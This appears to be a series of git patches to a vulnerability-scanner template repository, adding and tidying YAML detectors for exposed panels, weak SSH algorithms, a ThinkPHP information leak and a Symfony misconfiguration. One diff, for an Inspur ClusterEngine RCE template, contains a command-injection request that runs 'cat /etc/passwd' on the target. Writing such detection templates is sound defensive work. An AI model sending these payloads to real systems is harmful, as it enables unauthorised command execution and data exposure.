b/exposed-panels/versa/versa-flexvnf-login.yaml index 1920eb0332..62c0e3a824 100644 --- a/exposed-panels/versa/versa-flexvnf-login.yaml +++ b/exposed-panels/versa/versa-flexvnf-login.yaml @@ -1,8 +1,8 @@ id: versa-flexvnf-login info: - name: Flex VNF Web-UI Detection - description: Flex VNF Web-UI Panel Detection + name: Flex VNF Web-UI Detection + description: Flex VNF Web-UI Panel Detection author: c-sh0 severity: info reference: From fdaba3638837799dff849082bec35ee1f9e6aa17 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:59:52 +0530 Subject: [PATCH 0616/1415] Update versa-networks-logo.yaml --- technologies/versa/versa-networks-logo.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/versa/versa-networks-logo.yaml b/technologies/versa/versa-networks-logo.yaml index 1d528de127..d8183c7c3d 100644 --- a/technologies/versa/versa-networks-logo.yaml +++ b/technologies/versa/versa-networks-logo.yaml @@ -5,7 +5,7 @@ info: author: c-sh0 severity: info metadata: - shodan-query: + shodan-query: - http.favicon.hash:-1053531639 - http.favicon.hash:186362384 - http.favicon.hash:2033952700 From 38d5c2e3de77b9d4a35968b58eb36beea1feb808 Mon Sep 17 00:00:00 2001 From: Felipe Caon <felipecaon@gmail.com> Date: Thu, 24 Nov 2022 13:42:41 -0300 Subject: [PATCH 0617/1415] CVE-2022-25481 --- cves/2022/CVE-2022-25481.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2022/CVE-2022-25481.yaml diff --git a/cves/2022/CVE-2022-25481.yaml b/cves/2022/CVE-2022-25481.yaml new file mode 100644 index 0000000000..008ebef026 --- /dev/null +++ b/cves/2022/CVE-2022-25481.yaml @@ -0,0 +1,28 @@ +id: CVE-2022-25481 + +info: + name: ThinkPHP 5.0.24 - Information Disclosure + author: caon + severity: low + description: ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2022-25481 + tags: cve,cve2022,thinkphp + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?s=example' + + matchers-condition: and + matchers: + - type: word + words: + - "HttpException" + - "ThinkPHP" + condition: and + + - type: status + status: + - 404 + + From 7366d8914152c92ead64a4fbbfd52e1668e14406 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 24 Nov 2022 23:06:55 +0530 Subject: [PATCH 0618/1415] Update CVE-2022-25481.yaml --- cves/2022/CVE-2022-25481.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2022/CVE-2022-25481.yaml b/cves/2022/CVE-2022-25481.yaml index 008ebef026..7659747f9b 100644 --- a/cves/2022/CVE-2022-25481.yaml +++ b/cves/2022/CVE-2022-25481.yaml @@ -24,5 +24,3 @@ requests: - type: status status: - 404 - - From 9bcc32cacec35238c9327c73e32a75099548af65 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 24 Nov 2022 23:46:58 +0530 Subject: [PATCH 0619/1415] Update dropbear-weakmac-detect.yaml --- network/detection/dropbear-weakmac-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml index b566641be8..28bd7353d3 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -16,12 +16,13 @@ info: tags: network,ssh,dropbear network: - - inputs: - data: "\n" + host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: word words: From 7c2cdf6a95097dde958375778c4078ff77983615 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 23:51:41 +0530 Subject: [PATCH 0620/1415] Update CVE-2022-25481.yaml --- cves/2022/CVE-2022-25481.yaml | 20 +++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-25481.yaml b/cves/2022/CVE-2022-25481.yaml index 7659747f9b..deb385a179 100644 --- a/cves/2022/CVE-2022-25481.yaml +++ b/cves/2022/CVE-2022-25481.yaml @@ -4,9 +4,15 @@ info: name: ThinkPHP 5.0.24 - Information Disclosure author: caon severity: low - description: ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2022-25481 - tags: cve,cve2022,thinkphp + description: | + ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php. + reference: + - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25481 + metadata: + verified: true + shodan-query: title:"ThinkPHP" + tags: cve,cve2022,thinkphp,disclosure requests: - method: GET @@ -17,9 +23,13 @@ requests: matchers: - type: word words: - - "HttpException" - "ThinkPHP" - condition: and + + - type: word + words: + - "HttpException" + - "TRACE" + condition: or - type: status status: From 83592ece0214ff08e5b2e3a68bd061b381bd4f1d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 00:01:03 +0530 Subject: [PATCH 0621/1415] Update dropbear-weakmac-detect.yaml --- network/detection/dropbear-weakmac-detect.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml index 28bd7353d3..950c2b8734 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -24,8 +24,11 @@ network: - "{{Host}}:22" matchers: - - type: word - words: - - "hmac-md5" - - "hmac-sha1" - condition: or + - type: regex + regex: + - 'SSH\-2\.0\-([a-z_0-9.]+)' + + extractors: + - type: regex + regex: + - 'SSH\-2\.0\-([a-z_0-9.]+)' From 666952c57119529f07dee21aeea96f92a774b56d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 00:02:02 +0530 Subject: [PATCH 0622/1415] Update dropbear-weakmac-detect.yaml --- network/detection/dropbear-weakmac-detect.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml index 950c2b8734..28bd7353d3 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -24,11 +24,8 @@ network: - "{{Host}}:22" matchers: - - type: regex - regex: - - 'SSH\-2\.0\-([a-z_0-9.]+)' - - extractors: - - type: regex - regex: - - 'SSH\-2\.0\-([a-z_0-9.]+)' + - type: word + words: + - "hmac-md5" + - "hmac-sha1" + condition: or From 3976eaca144d221768e416271f51eee72da2f1c6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 00:03:45 +0530 Subject: [PATCH 0623/1415] Update dropbear-weakalgo-detect.yaml --- network/detection/dropbear-weakalgo-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/dropbear-weakalgo-detect.yaml b/network/detection/dropbear-weakalgo-detect.yaml index 4d42a17c92..7e9ca28537 100644 --- a/network/detection/dropbear-weakalgo-detect.yaml +++ b/network/detection/dropbear-weakalgo-detect.yaml @@ -16,12 +16,13 @@ info: tags: network,ssh,dropbear network: - - inputs: - data: "\n" + host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: word words: From f941adcb42855c9479e5c3afea003c0daf980ba5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 00:05:59 +0530 Subject: [PATCH 0624/1415] Update dropbear-cbc-ciphers.yaml --- network/detection/dropbear-cbc-ciphers.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index df15542885..5aa3f4ba42 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -16,12 +16,13 @@ info: tags: network,ssh,dropbear network: - - inputs: - data: "\n" + host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: word words: From 8be960f830dadc8344d0bbbd4977a8348a8ae262 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 24 Nov 2022 19:17:51 -0500 Subject: [PATCH 0625/1415] Create ffserver-status.yaml --- exposures/logs/ffserver-status.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/ffserver-status.yaml diff --git a/exposures/logs/ffserver-status.yaml b/exposures/logs/ffserver-status.yaml new file mode 100644 index 0000000000..892ffc4129 --- /dev/null +++ b/exposures/logs/ffserver-status.yaml @@ -0,0 +1,23 @@ +id: ffserver-status + +info: + name: ffserver Status Detect + author: notnotnotveg,tess + severity: low + metadata: + verified: true + shodan-query: title:"ffserver Status" + tags: detect,exposures,logs,ffserver + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + words: + - "ffserver Status" + - "Available Streams" + - "Connection Status" + condition: and From 48d04d13d089b67a6616eb54723852b0f94e157e Mon Sep 17 00:00:00 2001 From: powerexploit <dobhal.ankit@protonmail.com> Date: Thu, 24 Nov 2022 22:57:07 -0500 Subject: [PATCH 0626/1415] Added pega infinity web login signature --- exposed-panels/pega-web-login.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/pega-web-login.yaml diff --git a/exposed-panels/pega-web-login.yaml b/exposed-panels/pega-web-login.yaml new file mode 100644 index 0000000000..7fe676344e --- /dev/null +++ b/exposed-panels/pega-web-login.yaml @@ -0,0 +1,29 @@ +id: pega-web-login + +info: + name: Pega Infinity Web Login + author: powerexploit + severity: info + description: | + Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation + reference: + - https://www.pega.com/infinity + + tags: panel,pega + +requests: + - method: GET + path: + - "{{BaseURL}}/prweb/PRAuth/app/default/" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Pega Infinity' + - type: status + status: + - 200 From e760c04242b8b3378a33eca99f3a4bbfb8bda0bf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 11:34:01 +0530 Subject: [PATCH 0627/1415] Update ffserver-status.yaml --- exposures/logs/ffserver-status.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/exposures/logs/ffserver-status.yaml b/exposures/logs/ffserver-status.yaml index 892ffc4129..9a0ebcb6c5 100644 --- a/exposures/logs/ffserver-status.yaml +++ b/exposures/logs/ffserver-status.yaml @@ -1,18 +1,20 @@ id: ffserver-status info: - name: ffserver Status Detect + name: FFserver Status Detect author: notnotnotveg,tess severity: low metadata: verified: true shodan-query: title:"ffserver Status" - tags: detect,exposures,logs,ffserver + tags: exposures,logs,ffserver requests: - method: GET path: - "{{BaseURL}}" + + matchers-condition: and matchers: - type: word part: body @@ -21,3 +23,7 @@ requests: - "Available Streams" - "Connection Status" condition: and + + - type: status + status: + - 200 From dcc799477b503c24e42ac3a506cc4683e70f07b9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 25 Nov 2022 06:06:21 +0000 Subject: [PATCH 0628/1415] Auto Generated New Template Addition List [Fri Nov 25 06:06:21 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a804ffcffe..20f42a99a5 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml +exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml misconfiguration/libvirt-exporter-metrics.yaml From 8b37efec5ebdc1803c4e44fc5848149a119ba522 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 11:36:52 +0530 Subject: [PATCH 0629/1415] lint fix --- exposed-panels/pega-web-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/pega-web-login.yaml b/exposed-panels/pega-web-login.yaml index 7fe676344e..dc76ff4e57 100644 --- a/exposed-panels/pega-web-login.yaml +++ b/exposed-panels/pega-web-login.yaml @@ -1,11 +1,11 @@ id: pega-web-login info: - name: Pega Infinity Web Login + name: Pega Infinity Web Login author: powerexploit severity: info description: | - Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation + Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation reference: - https://www.pega.com/infinity @@ -15,7 +15,7 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRAuth/app/default/" - + host-redirects: true max-redirects: 2 matchers-condition: and From f6ec3bcc89b96d860dbd92e7c48b973cc5a4116f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 12:15:58 +0530 Subject: [PATCH 0630/1415] Update pega-web-login.yaml --- exposed-panels/pega-web-login.yaml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/exposed-panels/pega-web-login.yaml b/exposed-panels/pega-web-login.yaml index dc76ff4e57..09397816e7 100644 --- a/exposed-panels/pega-web-login.yaml +++ b/exposed-panels/pega-web-login.yaml @@ -1,14 +1,17 @@ -id: pega-web-login +id: pega-web-panel info: - name: Pega Infinity Web Login + name: Pega Infinity Web Login Panel author: powerexploit severity: info description: | Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation reference: - https://www.pega.com/infinity - + metadata: + verified: true + shodan-query: title:"Pega Platform" + google-dork: inurl:"/prweb/PRAuth/app/default" tags: panel,pega requests: @@ -23,7 +26,12 @@ requests: - type: word part: body words: - - 'Pega Infinity' + - 'alt="Pega Infinity' + - 'alt="Pega Logo' + - 'id = "pegaLogin' + - 'Pega Platform' + condition: or + - type: status status: - 200 From 6d1bef0801ef7b7ad430ab18bb4622dc8f1e2675 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 12:16:13 +0530 Subject: [PATCH 0631/1415] Update and rename pega-web-login.yaml to pega-web-panel.yaml --- exposed-panels/{pega-web-login.yaml => pega-web-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{pega-web-login.yaml => pega-web-panel.yaml} (100%) diff --git a/exposed-panels/pega-web-login.yaml b/exposed-panels/pega-web-panel.yaml similarity index 100% rename from exposed-panels/pega-web-login.yaml rename to exposed-panels/pega-web-panel.yaml From 66681f4daef8d03e5f45ff5a4197d985f74caec4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 25 Nov 2022 13:03:26 +0530 Subject: [PATCH 0632/1415] Update and rename inspur-clusterengine-v4-sysshell-rce.yaml to inspur-clusterengine-rce.yaml --- ...-v4-sysshell-rce.yaml => inspur-clusterengine-rce.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename vulnerabilities/other/{inspur-clusterengine-v4-sysshell-rce.yaml => inspur-clusterengine-rce.yaml} (78%) diff --git a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml b/vulnerabilities/other/inspur-clusterengine-rce.yaml similarity index 78% rename from vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml rename to vulnerabilities/other/inspur-clusterengine-rce.yaml index 24449c2470..eed5f53949 100644 --- a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml +++ b/vulnerabilities/other/inspur-clusterengine-rce.yaml @@ -1,4 +1,4 @@ -id: inspur-clusterengine-v4-sysshell-rce +id: inspur-clusterengine-rce info: name: Inspur Clusterengine V4 SYSshell RCE @@ -7,8 +7,7 @@ info: reference: - https://github.com/MzzdToT/ClusterEngineV4.0sysShell_rce metadata: - verified: true - shodan-query: title="TSCEV4.0" + fofa-query: title="TSCEV4.0" tags: inspur,clusterengine,rce requests: @@ -16,6 +15,8 @@ requests: - | POST /sysShell HTTP/1.1 Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Cookie: lang=cn op=doPlease&node=cu01&command=cat+/etc/passwd From 5d2141e407c2059e60525d067060dbeda8b4a824 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 25 Nov 2022 13:08:40 +0530 Subject: [PATCH 0633/1415] Update CVE-2022-25481.yaml --- cves/2022/CVE-2022-25481.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25481.yaml b/cves/2022/CVE-2022-25481.yaml index deb385a179..9cbf11bcf8 100644 --- a/cves/2022/CVE-2022-25481.yaml +++ b/cves/2022/CVE-2022-25481.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true shodan-query: title:"ThinkPHP" - tags: cve,cve2022,thinkphp,disclosure + tags: cve,cve2022,thinkphp,exposure,oss requests: - method: GET From e89d20993283c6f0cce203fc67c51ba56b1914b6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 25 Nov 2022 07:56:07 +0000 Subject: [PATCH 0634/1415] Auto Generated New Template Addition List [Fri Nov 25 07:56:07 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 20f42a99a5..46bd828384 100644 --- a/.new-additions +++ b/.new-additions @@ -14,3 +14,4 @@ misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml +vulnerabilities/other/inspur-clusterengine-rce.yaml From 30d1db70767a8b2e832ab627e7419b1044ddfc48 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 14:04:53 +0530 Subject: [PATCH 0635/1415] Update versa-director-login.yaml --- exposed-panels/versa/versa-director-login.yaml | 15 +++------------ 1 file changed, 3 insertions(+), 12 deletions(-) diff --git a/exposed-panels/versa/versa-director-login.yaml b/exposed-panels/versa/versa-director-login.yaml index ff042fffc7..f2362ec1f4 100644 --- a/exposed-panels/versa/versa-director-login.yaml +++ b/exposed-panels/versa/versa-director-login.yaml @@ -1,38 +1,29 @@ id: versa-director-login info: - name: Versa Director UI Login Panel + name: Versa Director Login Panel author: c-sh0 - description: | - Versa Director Login Panel detection (<title> is broken by newline, additional regex should Future proof this?) severity: info reference: - https://versa-networks.com/products/components/ metadata: + verified: true shodan-query: http.title:"VERSA DIRECTOR Login" - tags: panel,versa,sdwan + tags: panel,versa,director requests: - method: GET path: - "{{BaseURL}}/versa/login" - redirects: true - max-redirects: 2 matchers-condition: and matchers: - - type: word words: - "VERSA DIRECTOR" - "Login" condition: and - - type: regex - part: body - regex: - - '(?i)(VERSA DIRECTOR)' - - type: status status: - 200 From 124b867ecb12567a3c22f045ad1cc7224a5b2806 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 14:14:48 +0530 Subject: [PATCH 0636/1415] Update versa-flexvnf-login.yaml --- exposed-panels/versa/versa-flexvnf-login.yaml | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/exposed-panels/versa/versa-flexvnf-login.yaml b/exposed-panels/versa/versa-flexvnf-login.yaml index 62c0e3a824..2ee27f264d 100644 --- a/exposed-panels/versa/versa-flexvnf-login.yaml +++ b/exposed-panels/versa/versa-flexvnf-login.yaml @@ -1,31 +1,27 @@ -id: versa-flexvnf-login +id: versa-flexvnf-panel info: - name: Flex VNF Web-UI Detection - description: Flex VNF Web-UI Panel Detection + name: Versa FlexVNF Web-UI Panel author: c-sh0 severity: info reference: - https://versa-networks.com/products/components/ metadata: + verified: true shodan-query: http.title:"Flex VNF Web-UI" - tags: panel,versa,sdwan,flexvnf + tags: panel,versa,flexvnf requests: - method: GET path: - "{{BaseURL}}" - stop-at-first-match: true - redirects: true - max-redirects: 2 matchers-condition: and matchers: - - type: word part: body words: - - "<title>Flex VNF Web-UI" + - "Flex VNF Web-UI" - type: status status: From 0c532b7c4e9de2c3c80bcd88df765a6ac06c41eb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 14:15:28 +0530 Subject: [PATCH 0637/1415] Rename versa-flexvnf-login.yaml to versa-flexvnf-panel.yaml --- .../versa/{versa-flexvnf-login.yaml => versa-flexvnf-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/versa/{versa-flexvnf-login.yaml => versa-flexvnf-panel.yaml} (100%) diff --git a/exposed-panels/versa/versa-flexvnf-login.yaml b/exposed-panels/versa/versa-flexvnf-panel.yaml similarity index 100% rename from exposed-panels/versa/versa-flexvnf-login.yaml rename to exposed-panels/versa/versa-flexvnf-panel.yaml From 5ae333c2eb7c9f0f2f947bab618c058f03baa869 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 25 Nov 2022 09:38:12 +0000 Subject: [PATCH 0638/1415] Auto Generated New Template Addition List [Fri Nov 25 09:38:12 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 46bd828384..c863225edb 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml +exposed-panels/pega-web-panel.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From 3ed7d9814528237286e08431025122a33bbc79bf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 25 Nov 2022 09:42:28 +0000 Subject: [PATCH 0639/1415] Auto Generated New Template Addition List [Fri Nov 25 09:42:28 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c863225edb..ec14b71669 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-25481.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/mach-proweb-login.yaml From c37da61aa81c0afc11bd24f4883d8dc8ad80849c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 15:18:10 +0530 Subject: [PATCH 0640/1415] Update versa-analytics-server --- technologies/versa/versa-analytics-server | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/technologies/versa/versa-analytics-server b/technologies/versa/versa-analytics-server index a8dfa249a5..30b1f8bd93 100644 --- a/technologies/versa/versa-analytics-server +++ b/technologies/versa/versa-analytics-server @@ -2,31 +2,26 @@ id: versa-analytics-server info: name: Versa Analytics Server Detection - description: Versa Analytics Server Detection author: c-sh0 severity: info reference: - https://versa-networks.com/products/components/ - tags: panel,versa,sdwan + metadata: + verified: true + shodan-query: "Versa-Analytics-Server" + tags: tech,versa,analytics requests: - method: GET path: - "{{BaseURL}}" - redirects: true - max-redirects: 2 matchers-condition: and matchers: - - type: word part: header words: - - "Versa" - - - type: status - status: - - 200 + - "Versa-Analytics-Server" extractors: - type: kval From 91b9d54a8d165d78e00426b01ae676df6731340d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 25 Nov 2022 09:59:03 +0000 Subject: [PATCH 0641/1415] Auto Generated CVE annotations [Fri Nov 25 09:59:03 UTC 2022] :robot: --- cves/2022/CVE-2022-25481.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25481.yaml b/cves/2022/CVE-2022-25481.yaml index 9cbf11bcf8..fb6550e8d7 100644 --- a/cves/2022/CVE-2022-25481.yaml +++ b/cves/2022/CVE-2022-25481.yaml @@ -3,15 +3,20 @@ id: CVE-2022-25481 info: name: ThinkPHP 5.0.24 - Information Disclosure author: caon - severity: low + severity: high description: | ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php. reference: - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25481 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25481 + cwe-id: CWE-668 metadata: - verified: true shodan-query: title:"ThinkPHP" + verified: "true" tags: cve,cve2022,thinkphp,exposure,oss requests: From d29462a14de8586cd0b893c61dd90a0621c1322f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 16:04:54 +0530 Subject: [PATCH 0642/1415] Create symfony-fosjrouting-bundle.yaml --- .../symfony-fosjrouting-bundle.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 misconfiguration/symfony-fosjrouting-bundle.yaml diff --git a/misconfiguration/symfony-fosjrouting-bundle.yaml b/misconfiguration/symfony-fosjrouting-bundle.yaml new file mode 100644 index 0000000000..be1a5932f0 --- /dev/null +++ b/misconfiguration/symfony-fosjrouting-bundle.yaml @@ -0,0 +1,35 @@ +id: symfony-fosjrouting-bundle + +info: + name: Symfony FOSJsRoutingBundle + author: DhiyaneshDk + severity: medium + reference: + - https://packagist.org/packages/friendsofsymfony/jsrouting-bundle + metadata: + verified: true + shodan-query: http.html:"symfony Profiler" + tags: symfony + +requests: + - method: GET + path: + - '{{BaseURL}}/js/routing?callback=fos.Router.setDatafoobarfoo' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/**/fos.Router.setDatafoobarfoo({' + - 'routes' + condition: and + + - type: word + part: header + words: + - "application/javascript" + + - type: status + status: + - 200 From b0c33c1ad86ec253226343962a383f92890f2a5e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 16:08:10 +0530 Subject: [PATCH 0643/1415] Update versa-networks-logo.yaml --- technologies/versa/versa-networks-logo.yaml | 17 ++++++----------- 1 file changed, 6 insertions(+), 11 deletions(-) diff --git a/technologies/versa/versa-networks-logo.yaml b/technologies/versa/versa-networks-logo.yaml index d8183c7c3d..8fd3ef5a66 100644 --- a/technologies/versa/versa-networks-logo.yaml +++ b/technologies/versa/versa-networks-logo.yaml @@ -1,18 +1,15 @@ -id: versa-networks-logo +id: versa-networks-detect info: - name: Versa Networks Logo Detection + name: Versa Networks Detection author: c-sh0 severity: info - metadata: - shodan-query: - - http.favicon.hash:-1053531639 - - http.favicon.hash:186362384 - - http.favicon.hash:2033952700 - - http.favicon.hash:-1086395444 reference: - https://versa-networks.com/products/components/ - tags: tech,versa,sdwan,flexvnf + metadata: + verified: true + shodan-query: html:"Versa Networks" + tags: tech,versa,network requests: - method: GET @@ -26,8 +23,6 @@ requests: - "{{BaseURL}}/versa/app/img/versa-logo.png" stop-at-first-match: true - redirects: true - max-redirects: 2 matchers: - type: dsl dsl: From 58f397df2179ee8b8a35d2c711542d442fd8b8e4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 16:08:30 +0530 Subject: [PATCH 0644/1415] Rename versa-networks-logo.yaml to versa-networks-detect.yaml --- .../{versa-networks-logo.yaml => versa-networks-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/versa/{versa-networks-logo.yaml => versa-networks-detect.yaml} (100%) diff --git a/technologies/versa/versa-networks-logo.yaml b/technologies/versa/versa-networks-detect.yaml similarity index 100% rename from technologies/versa/versa-networks-logo.yaml rename to technologies/versa/versa-networks-detect.yaml From a31efc5c85cc81ba21aa1d62a0b6863000a64085 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 25 Nov 2022 16:14:06 +0530 Subject: [PATCH 0645/1415] Delete CVE-2022-3602.yaml --- cves/2022/CVE-2022-3602.yaml | 28 ---------------------------- 1 file changed, 28 deletions(-) delete mode 100644 cves/2022/CVE-2022-3602.yaml diff --git a/cves/2022/CVE-2022-3602.yaml b/cves/2022/CVE-2022-3602.yaml deleted file mode 100644 index 8e8bbf6481..0000000000 --- a/cves/2022/CVE-2022-3602.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: spookyssl-detect - -info: - name: SpookySSL CVE-2022-3602/CVE-2022-3786 - author: heywoodlh - severity: high - 